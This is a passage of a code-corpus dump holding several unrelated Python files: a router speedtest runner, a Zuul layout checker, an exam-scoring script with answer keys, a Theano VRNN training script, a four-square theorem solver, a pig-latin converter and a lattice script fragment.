mean and variance to the matrix\n if cur_box_idx == -2:\n cur_pixel_idx = np.zeros(xvf.size+1,dtype='bool')\n cur_pixel_idx[-1] = True\n \n mean_mat[:,cur_pixel_idx] = tmp_mean.T\n med_mat[:,cur_pixel_idx] = tmp_med.T\n var_mat[:,cur_pixel_idx] = tmp_var.T\n iqr_mat[:,cur_pixel_idx] = tmp_iqr\n elif cur_box_idx>=0:\n cur_coord = pivot_coords[pivot_idx[cur_box_idx]-1]\n cur_pixel_idx = (cur_coord[0] == xvf) & (cur_coord[1] == yvf)\n \n mean_mat[:,cur_pixel_idx] = tmp_mean.T\n med_mat[:,cur_pixel_idx] = tmp_med.T\n var_mat[:,cur_pixel_idx] = tmp_var.T\n iqr_mat[:,cur_pixel_idx] = tmp_iqr\n \n # Reset the RSS buffer and buffer index\n rss_buffer[:,:] = 0\n cur_buffer_idx = 0 \n \n # Update the high time and current box index\n cur_box_idx += 1\n high_time+=30.\n \n # There are no more boxes visited after the 100 index\n if cur_box_idx >= 100:\n break\n \n # Add the current rss to the buffer and update the index\n rss_buffer[:,cur_buffer_idx] = rss\n cur_buffer_idx+=1\n\nnp.savetxt(mean_mat_fname, mean_mat, delimiter=' ')\nnp.savetxt(med_mat_fname, med_mat, delimiter=' ')\nnp.savetxt(var_mat_fname, var_mat, delimiter=' ')\nnp.savetxt(iqr_mat_fname, iqr_mat, delimiter=' ')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ground_truth_creator.py","file_name":"ground_truth_creator.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"465938402","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport time\n\nfrom lib.log import *\nfrom lib import log\nfrom lib.api import RestGraphqlApi\nimport plugins\n\n\ndef parse_arguments():\n \"\"\"Get commandline arguments.\"\"\"\n parser = argparse.ArgumentParser(\n description='Run speedtest and write results to json file.')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--host', default='localhost')\n parser.add_argument('--log-file', default=log.LOGFILE)\n parser.add_argument('--max-delay', type=int, default=0)\n parser.add_argument('--results-file', default='/var/lib/128technology/t128-speedtest-results.json')\n parser.add_argument('--test', action='append', default=[])\n args = parser.parse_args()\n return args\n\n\ndef get_interface_stats(host):\n stats = {}\n api = RestGraphqlApi(host=host)\n query = '{ allNodes { nodes { deviceInterfaces { nodes { networkInterfaces { nodes { name } } type state { operationalStatus } } } } } }'\n try:\n interfaces = api.query(query).json()['data']['allNodes']['nodes'][0]['deviceInterfaces']['nodes']\n for interface in interfaces:\n network_interface_name = interface['networkInterfaces']['nodes'][0]['name']\n # ignore host interfaces\n if interface['type'] == 'host':\n continue\n stats[network_interface_name] = {\n 'type': interface['type'],\n 'up': interface['state']['operationalStatus'] == 'OPER_UP',\n }\n except:\n fatal('Could not retrieve interfaces status')\n return stats\n\n\ndef write_results(filename, results):\n with open(filename, 'w') as fd:\n json.dump(results, fd)\n\n\ndef main():\n args = parse_arguments()\n log.DEBUG = args.debug\n log.LOGFILE = args.log_file\n results = {}\n stats = get_interface_stats(args.host)\n plugins.load_plugins()\n # iterate over plugins and run get_results for each plugin\n # which is configured and where assigned interfaces are UP\n for plugin in plugins.plugins:\n test_interfaces = [\n x.split(':')[1] for x in args.test if x.startswith(plugin.name)\n ]\n for interface in test_interfaces:\n if interface not in stats:\n debug('Interface', interface, 'is unknown on this router')\n continue\n if not stats[interface]['up']:\n debug('Interface', interface, 'is down - skipping')\n continue\n _interface = interface.replace('local-wan', 'wan')\n result = plugin.get_results(_interface, stats, args.max_delay)\n result['ts'] = int(time.time())\n if plugin.name not in results:\n results[plugin.name] = {}\n results[plugin.name][interface] = result\n write_results(args.results_file, results)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"files/speedtest/t128-speedtest-runner.py","file_name":"t128-speedtest-runner.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"307983707","text":"#!/usr/bin/env python\n\n# Copyright 2014 OpenStack Foundation\n# Copyright 2014 SUSE Linux Products GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport yaml\nimport sys\n\nlayout = yaml.load(open('zuul/layout.yaml'))\n\n\ndef check_merge_template():\n \"\"\"Check that each job has a merge-check template.\"\"\"\n\n errors = False\n print(\"\\nChecking for usage of merge template\")\n print(\"====================================\")\n for project in layout['projects']:\n if project['name'] == 'z/tempest':\n continue\n try:\n correct = False\n for template in project['template']:\n if template['name'] == 'merge-check':\n correct = True\n if not correct:\n raise\n except:\n print(\"Project %s has no merge-check template\" % project['name'])\n errors = True\n return errors\n\n\ndef normalize(s):\n \"Normalize string for comparison.\"\n return s.lower().replace(\"_\", \"-\")\n\n\ndef check_sections():\n \"\"\"Check that the projects are in alphabetical order per section.\"\"\"\n\n print(\"Checking sections for alphabetical order\")\n print(\"========================================\")\n # Note that the file has different sections and we need to sort\n # entries within these sections.\n errors = False\n # Skip all entries before the first section header\n firstEntry = True\n last = \"\"\n for line in open('zuul/layout.yaml', 'r'):\n if line.startswith('# Section:'):\n last = \"\"\n section = line[10:].strip()\n print(\"Checking section '%s'\" % section)\n firstEntry = False\n if line.startswith(' - name: ') and not firstEntry:\n current = line[10:].strip()\n if (normalize(last) > normalize(current) and\n last != 'z/tempest'):\n print(\" Wrong alphabetical order: %(last)s, %(current)s\" %\n {\"last\": last, \"current\": current})\n errors = True\n last = current\n return errors\n\n\ndef check_formatting():\n errors = False\n count = 1\n\n print(\"Checking indents\")\n print(\"================\")\n\n for line in open('zuul/layout.yaml', 'r'):\n if (len(line) - len(line.lstrip(' '))) % 2 != 0:\n print(\"Line %(count)s not indented by multiple of 2:\\n\\t%(line)s\" %\n {\"count\": count, \"line\": line})\n errors = True\n count = count + 1\n\n return errors\n\n\ndef check_all():\n errors = check_sections()\n errors = check_formatting() or errors\n\n if errors:\n print(\"\\nFound errors in layout.yaml!\")\n else:\n print(\"\\nNo errors found in layout.yaml!\")\n return errors\n\nif __name__ == \"__main__\":\n sys.exit(check_all())\n","sub_path":"tools/layout-checks.py","file_name":"layout-checks.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"321806166","text":"import os\nimport pandas as pd\n\n\n# In[75]:\n\n\n# In[15]:\n\n\n# Marking Scheme = \n# Power = 2,4,8 & -1,-2,-4 with break seq\n# Fibo = 2,3,5 & -1,-1,-2 with break seq\n# All or None = (n marks)\nAnswers={\n 'J':{\n 'q1': ['3','03'],'q2': ['5','05','14'],'q3': ['05','5','23'],'q4': ['BONUS','B'],'q5': ['A'],'q6': ['C'],'q7': ['C'],\n 'q8': ['4','04'], 'q9': ['BONUS'], 'q10': ['08','8'],'q11': ['C'],'q12': ['C'],'q13': ['B'],\n 'q14': ['C'],'q15': ['B'],'q16': ['B'],'q17': ['D'],'q18': ['C'],'q19': ['15'],'q20': ['2','3','02','03']\n },\n 'H':{\n 'q1': ['C'],'q2': ['C'],'q3': ['C'],'q4': ['C'],'q5': ['B'],'q6': ['BONUS'],'q7': ['3','03'],\n 'q8': ['9','09'], 'q9': ['4','04'],'q10': ['45'],'q11': ['12'],'q12': ['16'],'q13': ['C'],\n 'q14': ['A'],'q15': ['B'],'q16': ['23'],'q17': ['61'],'q18': ['B'],\n 'q19': ['ABC','ACB','BAC','BCA','CBA','CAB'],'q20': ['C'],\n 'q21': 'B','q22': 'A','q23': 'D','q24': 'D','q25': 'B',\n }\n}\n\n# Fibo is across the sections - Q4,5,6,7,13,\nSections = {\n 'J':{\n 'Power1':{'ques':[1,2,3],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo1':{'ques':[4,5,6,7],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'Power2':{'ques':[8,9,10],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo2':{'ques':[11,12,13,14],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone1':{'ques':[15,16],'marks':9},\n 'allNone2':{'ques':[17,18],'marks':12},\n 'allNone3':{'ques':[19,20],'marks':6},\n },\n\n 'H' : {\n 'allNone1':{'ques':[1],'marks':8},\n 'Power1':{'ques':[2,3,4],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n # 'allNone2':{'ques':[5,6],'marks':12},\n 'allNone2':{'ques':[5,6],'marks':6},\n 'Fibo1':{'ques':[7,8,9,10,11],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone3':{'ques':[12],'marks':8},\n 'Power2':{'ques':[13,14,15],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Proxy1':{'ques':[16,17],'+marks':5,'-marks':3},\n 'Power3':{'ques':[18,19,20],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'TechnoFin':{'ques':[21,22,23,24,25]},\n },\n 'JK' : {\n 'Power1':{'ques':[1,2,3],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo1':{'ques':[4,5,6,7],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'Power2':{'ques':[8,9,10],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Fibo2':{'ques':[11,12,13,14],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone1':{'ques':[15,16],'marks':9},\n 'allNone2':{'ques':[17,18],'marks':12},\n 'allNone3':{'ques':[19,20],'marks':6},\n\n },\n 'HK' : {\n 'allNone1':{'ques':[1],'marks':8},\n 'Power1':{'ques':[2,3,4,5],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'allNone2':{'ques':[6],'marks':12},\n 'Fibo1':{'ques':[7,8,9,10,11],'+seq':[2,3,5,8,13,21],'-seq':[1,1,2,3,5,8]},\n 'allNone3':{'ques':[12],'marks':8},\n 'Power2':{'ques':[13,14,15],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n 'Proxy1':{'ques':[16,17],'+marks':5,'-marks':3},\n 'Power3':{'ques':[18,19,20],'+seq':[2,4,8,16],'-seq':[1,2,4,8,16]},\n\n },\n}\n\nqNos={\n 'J':['q'+str(i) for i in range(1,21)],\n 'H':['q'+str(i) for i in range(1,26)]\n}\n\n# In[76]:\n\nonce = 0\ndef report(Status,streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks):\n global once\n if(not once):\n once = 1\n print('Question\\tStatus \\t Streak\\tSection \\tMarks_Update\\tMarked:\\tAnswer:')\n \n print('%s \\t %s \\t\\t %s \\t %s \\t %s \\t %s \\t %s ' % (qNo,\n Status,str(streak), '['+scheme+'] ',(str(prevmarks)+' + '+str(currmarks)+' ='+str(marks)),str(marked),str(ans)))\n# check sectionwise only.\ndef evaluate(resp,answers,sections,explain=False):\n marks,num_correct,num_wrong = 0,0,0\n allans = answers.items()\n sectionMarks={}\n prevmarks=0\n prevSectionMarks=0\n for scheme,section in sections.items():\n sectionques = section['ques']\n prevcorrect=None\n allflag=1\n streak=0\n for q in sectionques:\n qNo='q'+str(q)\n ans=answers[qNo]\n marked = resp.get(qNo, 'X')\n if(type(marked)==float or type(marked)==int):\n \tmarked=str(int(marked))\n \n firstQ = sectionques[0]\n lastQ = sectionques[len(sectionques)-1]\n unmarked = marked=='X' or marked==''\n bonus = 'BONUS' in ans\n correct = bonus or (marked in ans)\n inrange=0\n \n# ('q13(Power2) Correct(streak0) -3 + 2 = -1', 'C', ['C'])\n# ('q14(Power2) Correct(streak0) -1 + 2 = 1', 'A', ['A'])\n# ('q15(Power2) Incorrect(streak0) 1 + -1 = 0', 'C', ['B'])\n if(unmarked or int(q)==firstQ):\n streak=0\n elif(prevcorrect == correct):\n streak+=1\n else:\n streak=0\n \n \n if( 'allNone' in scheme):\n #loop on all sectionques\n allflag = allflag and correct\n if(q == lastQ ):\n #at the end check allflag\n prevcorrect = correct\n currmarks = section['marks'] if allflag else 0\n else:\n currmarks = 0\n \n elif('Proxy' in scheme):\n a=int(ans[0])\n #proximity check\n inrange = 1 if unmarked else (float(abs(int(marked) - a))/float(a) <= 0.25)\n currmarks = section['+marks'] if correct else (0 if inrange else -section['-marks']) \n \n elif('Fibo' in scheme or 'Power' in scheme):\n currmarks = section['+seq'][streak] if correct else (0 if unmarked else -section['-seq'][streak]) \n elif('TechnoFin' in scheme):\n currmarks = 0\n else:\n print('Invalid Sections')\n prevmarks=marks\n marks += currmarks\n \n if(explain):\n if bonus:\n report('BonusQ',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif correct:\n report('Correct',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif unmarked:\n report('Unmarked',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n elif inrange:\n report('InProximity',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n else:\n report('Incorrect',streak,scheme,qNo,marked,ans,prevmarks,currmarks,marks)\n if correct:\n num_correct+=1\n elif not unmarked:\n num_wrong+=1\n prevcorrect = correct\n \n sectionMarks[scheme]=marks-prevSectionMarks\n prevSectionMarks=marks\n \n return marks,num_correct,num_wrong,sectionMarks\n\nimport numpy as np\n\n\nkv = 0\n\nQs=['q'+str(i) for i in range(1,21)]+['t'+str(i) for i in range(1,6)]\nsheetCols=['batch','error','filename','path','roll']+Qs\nunionSections=['Power1','Power2','Power3','Fibo1','Fibo2','allNone1','allNone2','allNone3','Proxy1','TechnoFin']\nresultSheetCols=sheetCols+['score','num_correct','num_wrong']+unionSections\n\n# y = pd.read_csv('results/multiMarkedSheet.csv')[['roll','score']]\n# y = y.replace(np.nan,'',regex=True)\nx = pd.read_csv('results/badRollSheet.csv')[sheetCols]\nx = x.replace(np.nan,'',regex=True)\n\n\nresultFileJ = 'results/JScoreWithNums'+('KVJNV' if kv else '')+'Results2017_test.csv'\nresultFileH = 'results/HScoreWithNums'+('KVJNV' if kv else '')+'Results2017_test.csv'\nif(not os.path.exists(resultFileJ)):\n with open(resultFileJ,'a') as f:\n results=[resultSheetCols]\n pd.DataFrame(results).to_csv(f,header=False)\nelse:\n print('WARNING : Appending to Previous Result file!')\n\nif(not os.path.exists(resultFileH)):\n with open(resultFileH,'a') as f:\n results=[resultSheetCols]\n pd.DataFrame(results).to_csv(f,header=False)\nelse:\n print('WARNING : Appending to Previous Result file!')\nintQs ={\n'J' : [ 'q'+str(qNo) for qNo in (range(1,4)+range(8,11)+range(19,21))],\n'H'\t:[ 'q'+str(qNo) for qNo in (range(12,13)+range(16,18)+range(7,12))]\n} \n# x[intQs[squad]]=x[intQs[squad]].astype(int)\nexplain=0\nwith open(resultFileJ,'a') as fJ:\n with open(resultFileH,'a') as fH:\n counterx,countery=0,0\n for i,row in enumerate(x.iterrows()):\n # results/allResults\n squad = row[1].roll[0]\n # print(squad)\n # debug=raw_input()\n score,nc,nw,sectionMarks = evaluate(dict(row[1]),Answers[squad],Sections[squad],explain=explain)\n f_ = fJ if squad=='J' else fH\n # print(sectionMarks.items())\n if(explain):\n debug=raw_input()\n secMarks=[]\n for x in range(len(unionSections)):\n try:\n secMarks.append(sectionMarks[unionSections[x]])\n except:\n secMarks.append('')\n pd.DataFrame(list(row[1])+[score,nc,nw]+secMarks).T.to_csv(f_,header=False)\n # y_i=y.iloc[i]\n # scorey = y_i.score\n # rolly = y_i.roll\n # if(scorey!='' and scorey!=0 and score!=int(scorey)):\n # countery+=1\n # print('Error: wrong scores : ',row[1]['roll'],score,rolly,scorey,countery)\n # else:\n # counterx+=1\n # print('Correct score',score,scorey,counterx)\n print(row[1]['roll'],score,nc,nw,sectionMarks)\n","sub_path":"extras/mini_scripts/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":9581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"492493733","text":"#### The code is adapted from https://github.com/jych/nips2015_vrnn which is linked to the following reference.\n##Chung, J., Kastner, K., Dinh, L., Goel, K., Courville, A.C., Bengio, Y.: A recurrent latent variable model for sequential data. Advances in neural information processing systems 28, 2980–2988 (2015)\n##\nimport os\n\nos.environ['THEANO_FLAGS'] = \"device=cuda,force_device=True,floatX=float32\"\nimport numpy as np\nimport theano\nimport theano.tensor as T\nfrom cle.cle.cost import MSE, Gaussian, KLGaussianGaussian\nfrom cle.cle.data import Iterator\nfrom cle.cle.models import Model\nfrom cle.cle.layers import InitCell\nfrom cle.cle.layers.feedforward import FullyConnectedLayer\nfrom cle.cle.layers.recurrent import LSTM\nfrom cle.cle.train import Training\nfrom cle.cle.train.ext import (\n EpochCount,\n GradientClipping,\n Monitoring,\n Picklize,\n EarlyStopping,\n WeightNorm\n)\nfrom cle.cle.train.opt import RMSProp, Adam\nfrom cle.cle.utils import init_tparams, sharedX\nfrom cle.cle.utils.compat import OrderedDict\nfrom cle.cle.utils.op import Gaussian_sample\nfrom cle.cle.utils.gpu_op import concatenate\n\nfrom datasets.npp import NPP\n\n\ndef main():\n for rnn_dim in [256]:\n pkl_name = 'VRNN_hidden{}'.format(rnn_dim)\n npp_path = './datasets/npp.npy'\n save_path = './models/'\n force_saving_freq = 1\n epoch = 1\n batch_size = 256\n x_dim = 1\n z_dim = 64\n lr = 0.001\n\n p_x_dim = 64\n x2s_dim = 64\n z2s_dim = 64\n q_z_dim = 64\n p_z_dim = 64\n target_dim = x_dim\n\n model = Model()\n\n init_W = InitCell('rand')\n init_U = InitCell('ortho')\n init_b = InitCell('zeros')\n init_b_sig = InitCell('const', mean=0.6)\n\n train_data = NPP(name='train', path=npp_path)\n\n x, y = train_data.theano_vars()\n\n x_1 = FullyConnectedLayer(name='x_1',\n parent=['x_t'],\n parent_dim=[x_dim],\n nout=x2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n x_2 = FullyConnectedLayer(name='x_2',\n parent=['x_1'],\n parent_dim=[x2s_dim],\n nout=x2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n z_1 = FullyConnectedLayer(name='z_1',\n parent=['z_t'],\n parent_dim=[z_dim],\n nout=z2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n z_2 = FullyConnectedLayer(name='z_2',\n parent=['z_1'],\n parent_dim=[z2s_dim],\n nout=z2s_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n rnn = LSTM(name='rnn',\n parent=['x_2', 'z_2'],\n parent_dim=[x2s_dim, z2s_dim],\n nout=rnn_dim,\n unit='tanh',\n init_W=init_W,\n init_U=init_U,\n init_b=init_b)\n\n phi_1 = FullyConnectedLayer(name='phi_1',\n parent=['x_2', 's_tm1'],\n parent_dim=[x2s_dim, rnn_dim],\n nout=q_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n phi_2 = FullyConnectedLayer(name='phi_2',\n parent=['phi_1'],\n parent_dim=[q_z_dim],\n nout=q_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n phi_mu = FullyConnectedLayer(name='phi_mu',\n parent=['phi_2'],\n parent_dim=[q_z_dim],\n nout=z_dim,\n unit='linear',\n init_W=init_W,\n init_b=init_b)\n\n phi_sig = FullyConnectedLayer(name='phi_sig',\n parent=['phi_2'],\n parent_dim=[q_z_dim],\n nout=z_dim,\n unit='softplus',\n cons=1e-4,\n init_W=init_W,\n init_b=init_b_sig)\n\n prior_1 = FullyConnectedLayer(name='prior_1',\n parent=['s_tm1'],\n parent_dim=[rnn_dim],\n nout=p_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n prior_2 = FullyConnectedLayer(name='prior_2',\n parent=['prior_1'],\n parent_dim=[p_z_dim],\n nout=p_z_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n prior_mu = FullyConnectedLayer(name='prior_mu',\n parent=['prior_2'],\n parent_dim=[p_z_dim],\n nout=z_dim,\n unit='linear',\n init_W=init_W,\n init_b=init_b)\n\n prior_sig = FullyConnectedLayer(name='prior_sig',\n parent=['prior_2'],\n parent_dim=[p_z_dim],\n nout=z_dim,\n unit='softplus',\n cons=1e-4,\n init_W=init_W,\n init_b=init_b_sig)\n\n theta_1 = FullyConnectedLayer(name='theta_1',\n parent=['z_2', 's_tm1'],\n parent_dim=[z2s_dim, rnn_dim],\n nout=p_x_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n theta_2 = FullyConnectedLayer(name='theta_2',\n parent=['theta_1'],\n parent_dim=[p_x_dim],\n nout=p_x_dim,\n unit='relu',\n init_W=init_W,\n init_b=init_b)\n\n theta_mu = FullyConnectedLayer(name='theta_mu',\n parent=['theta_2'],\n parent_dim=[p_x_dim],\n nout=target_dim,\n unit='linear',\n init_W=init_W,\n init_b=init_b)\n\n theta_sig = FullyConnectedLayer(name='theta_sig',\n parent=['theta_2'],\n parent_dim=[p_x_dim],\n nout=target_dim,\n unit='softplus',\n cons=1e-4,\n init_W=init_W,\n init_b=init_b_sig)\n\n nodes = [rnn,\n x_1, x_2, z_1, z_2,\n phi_1, phi_2, phi_mu, phi_sig,\n prior_1, prior_2, prior_mu, prior_sig,\n theta_1, theta_2, theta_mu, theta_sig]\n\n params = OrderedDict()\n\n for node in nodes:\n if node.initialize() is not None:\n params.update(node.initialize())\n\n params = init_tparams(params)\n\n s_0 = rnn.get_init_state(batch_size)\n\n x_1_temp = x_1.fprop([y], params)\n x_2_temp = x_2.fprop([x_1_temp], params)\n\n def inner_fn(x_t, s_tm1):\n\n phi_1_t = phi_1.fprop([x_t, s_tm1], params)\n phi_2_t = phi_2.fprop([phi_1_t], params)\n phi_mu_t = phi_mu.fprop([phi_2_t], params)\n phi_sig_t = phi_sig.fprop([phi_2_t], params)\n\n prior_1_t = prior_1.fprop([s_tm1], params)\n prior_2_t = prior_2.fprop([prior_1_t], params)\n prior_mu_t = prior_mu.fprop([prior_2_t], params)\n prior_sig_t = prior_sig.fprop([prior_2_t], params)\n\n z_t = Gaussian_sample(phi_mu_t, phi_sig_t)\n z_1_t = z_1.fprop([z_t], params)\n z_2_t = z_2.fprop([z_1_t], params)\n\n s_t = rnn.fprop([[x_t, z_2_t], [s_tm1]], params)\n\n return s_t, phi_mu_t, phi_sig_t, prior_mu_t, prior_sig_t, z_2_t\n\n ((s_temp, phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp, z_2_temp), updates) = \\\n theano.scan(fn=inner_fn,\n sequences=[x_2_temp],\n outputs_info=[s_0, None, None, None, None, None])\n\n for k, v in updates.iteritems():\n k.default_update = v\n\n s_temp = concatenate([s_0[None, :, :], s_temp[:-1]], axis=0)\n theta_1_temp = theta_1.fprop([z_2_temp, s_temp], params)\n theta_2_temp = theta_2.fprop([theta_1_temp], params)\n theta_mu_temp = theta_mu.fprop([theta_2_temp], params)\n theta_sig_temp = theta_sig.fprop([theta_2_temp], params)\n\n recon = Gaussian(y, theta_mu_temp, theta_sig_temp)\n recon_term = recon.mean()\n recon_term.name = 'recon_term'\n\n kl_temp = KLGaussianGaussian(phi_mu_temp, phi_sig_temp, prior_mu_temp, prior_sig_temp)\n kl_term = kl_temp.mean()\n kl_term.name = 'kl_term'\n\n nll_upper_bound = recon_term + kl_term\n nll_upper_bound.name = 'nll_upper_bound'\n\n model.inputs = [x, y]\n model.params = params\n model.nodes = nodes\n\n optimizer = Adam(lr=lr)\n\n extension = [\n GradientClipping(batch_size=batch_size),\n EpochCount(epoch),\n Picklize(freq=1, force_save_freq=force_saving_freq, path=save_path),\n WeightNorm()\n ]\n\n mainloop = Training(\n name=pkl_name,\n data=Iterator(train_data, batch_size),\n model=model,\n optimizer=optimizer,\n cost=nll_upper_bound,\n outputs=[nll_upper_bound],\n extension=extension\n )\n mainloop.run()\n\nmain()\n\n\n\n\n","sub_path":"VRNN_Gauss_init.py","file_name":"VRNN_Gauss_init.py","file_ext":"py","file_size_in_byte":11362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"137349374","text":"# four-square.py 四平方定理(Lagrange's four-square theorem)\r\n# coding: utf-8\r\n# 大分類 四平方定理\r\n# 中分類 数学\r\n# 小分類 四平方定理の解を求める\r\n# 参考\r\n#\r\n# 特色 mathライブラリを使用。sqrt()\r\n\r\nfrom math import *\r\n# 検算用。リストで与えられた4個の整数で平方の解を求める\r\ndef verification(m):\r\n result_v = 0\r\n for i in range(4):\r\n result_v = int(m[i])**2 + result_v\r\n return result_v\r\n\r\n# 判定用。4個の変数で与���られた整数で平方の解を求める\r\ndef IndividualVariable(n1,n2,n3,n4):\r\n result_i = n1**2 + n2**2 + n3**2 + n4**2\r\n return result_i\r\n\r\n# 値の平方根を求め、さらに整数部分を返す\r\ndef square_n(n):\r\n result_s = int(sqrt(n))\r\n return result_s\r\n\r\n# Main 整数を入力し、四平方定理の解を出力する\r\nm = []\r\nn1 = 0\r\nn2 = 0\r\nn3 = 0\r\nn4 = 0\r\nn = int(input())\r\nif n != 0:\r\n n1 = square_n(n) # 1個目の整数\r\n if n == IndividualVariable(n1,n2,n3,n4):\r\n n2 = 0\r\n n3 = 0\r\n n4 = 0\r\n else:\r\n n2 = square_n(n - n1**2) # 2個目の整数\r\n if n == IndividualVariable(n1,n2,n3,n4):\r\n n3 = 0\r\n n4 = 0\r\n else:\r\n n3 = square_n(n - n1**2 - n2**2) # 3個目の整数\r\n if n == IndividualVariable(n1,n2,n3,n4):\r\n n4 = 0\r\n else:\r\n n4 = square_n(n - n1**2 - n2**2- n3**2) # 4個目の整数\r\n\r\nm.append(n1)\r\nm.append(n2)\r\nm.append(n3)\r\nm.append(n4)\r\n\r\n# 求めた値のリストと検算結果の出力\r\nif n == verification(m):\r\n result = 'OK'\r\nelse:\r\n result = 'NG'\r\nprint('n=',n,m,result)","sub_path":"four-square.py","file_name":"four-square.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"540342199","text":"#Python Template for ES2B4 Assignment - 2\n\n#Name: Vigneshwar Syamasundar\n#ID : U1527115\n#Assignment Section : A3_3\n\nfrom assignment2_a3_1 import pigLatin_class\n\n\t\nclass gibberish_class(pigLatin_class):\n\n\tdef pLatin_converter(self):\n\t\tfinalResult = \"\"\n\t\tlistOfWords = self.sentence.split()\n\t\tfor word in listOfWords:\n\t\t\textraChars = \"\"\n\t\t\tfor letter in word:\n\t\t\t\tif letter not in pigLatin_class.latinAlphabet:\n\t\t\t\t\tword = word.replace(letter, \"\")\n\t\t\t\t\textraChars += letter\n\t\t\tif not self.containsVowel(word):\n\t\t\t\tfinalResult += word[1:] + word[0] + extraChars + \"hay \"\n\t\t\telse:\n\t\t\t\tif word[0] in pigLatin_class.VOWELS:\n\t\t\t\t\tfinalResult += word + extraChars + \"way \"\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(len(word)):\n\t\t\t\t\t\tif word[i] in pigLatin_class.VOWELS:\n\t\t\t\t\t\t\tfinalResult += word[i:] + word[0:i] + extraChars + \"ay \"\n\t\t\t\t\t\t\tbreak\n\t\treturn finalResult\n\t\n\n\tdef gibberish_converter(self):\n\t\tfinalResult = \"\"\n\t\tlistOfWords = self.sentence.split()\n\t\tfor word in listOfWords:\n\t\t\tperWord = \"\"\n\t\t\tif word.lstrip(\"-\").isdigit():\n\t\t\t\tperWord += word + \" \"\n\t\t\tfor letter in word:\n\t\t\t\tif letter in pigLatin_class.VOWELS:\n\t\t\t\t\tperWord += \"idig\" + letter\n\t\t\t\telse:\n\t\t\t\t\tperWord += letter\n\t\t\tfinalResult += perWord + \" \"\n\t\treturn finalResult\n\t\t\t\n\ngibberishInstance = gibberish_class(\"?23ghj5ejk\")\nprint(gibberishInstance.gibberish_converter())\npigLatinInstance = gibberish_class(\"?23ghj5ejk\")\nprint(pigLatinInstance.pLatin_converter())\n\n\nreadFile = open(\"gibberish_tests.txt\" , \"r\")\nfor line in readFile:\n\tpigLatinInstance.setSentence(line)\n\tgibberishInstance.setSentence(line)\n\n\tpigLatinLine = pigLatinInstance.pLatin_converter()\n\tgibberishLine = gibberishInstance.gibberish_converter()\n\n\tpigLatinWrite = open(\"pigLatined.txt\", \"a\")\n\tpigLatinWrite.write(pigLatinLine + '\\n')\n\n\tgibberishWrite = open(\"gibberished.txt\", \"a\")\n\tgibberishWrite.write(gibberishLine + '\\n')\n\nreadFile.close()\npigLatinWrite.close()\ngibberishWrite.close()\n\n","sub_path":"assignment2_a3_3.py","file_name":"assignment2_a3_3.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"338589677","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom functools import partial\n\nimport lattices\nimport scattering\nimport band_structure\nimport gui\n\nd = (np.array([1, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 1]),\n np.array([0, 0, 0]), \"xkcd:cement\", 2, \"proper\", \"latticevectors\",\n [2, 2, 2])\n\n\neq = np.isclose\n\n\ndef Lattice(\n a1=d[0], a2=d[1], a3=d[2], 